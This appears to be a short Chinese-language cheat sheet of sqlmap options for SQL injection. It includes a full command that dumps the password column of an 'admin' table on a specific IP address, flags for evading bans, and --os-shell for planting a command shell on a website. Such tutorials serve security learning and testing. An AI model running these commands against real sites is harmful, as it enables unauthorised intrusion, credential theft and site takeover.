常用最基础指令:
-u 指定注入点
–dbs 跑库名
–tables 跑表名
–columns 跑字段名
–dump 枚举数据 (手铐警告)
-D 指定库 -T 指定表 -C 指定字段
sqlmap.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C
password --dump
常见指令:
–random-agent 选择随机user-agents头
–delay=1 每次探测延时1秒(防止访问过快被ban)
–count 查看数据量
–proxy “http://127.0.0.1:1080” 使用本地1080端口
–level X 测试等级(最低1,最高5) level等级越高检测越详细,检测时间越长,例如 level大于2会检测cookie注入,大于3会检测头注入
–is-dba 查询当前用户权限,如果DBA是True可以尝试直接拿webshell
–os-shell 尝试往网站中放入一个cmdshell(就是拥有cmd权限的shell),先选择写入shell的脚本语言
有的需要填写网站的web目录的绝对路径,有的可以直接选择好shell的脚本语言类型就可以直接拿shell
–form 跑POST注入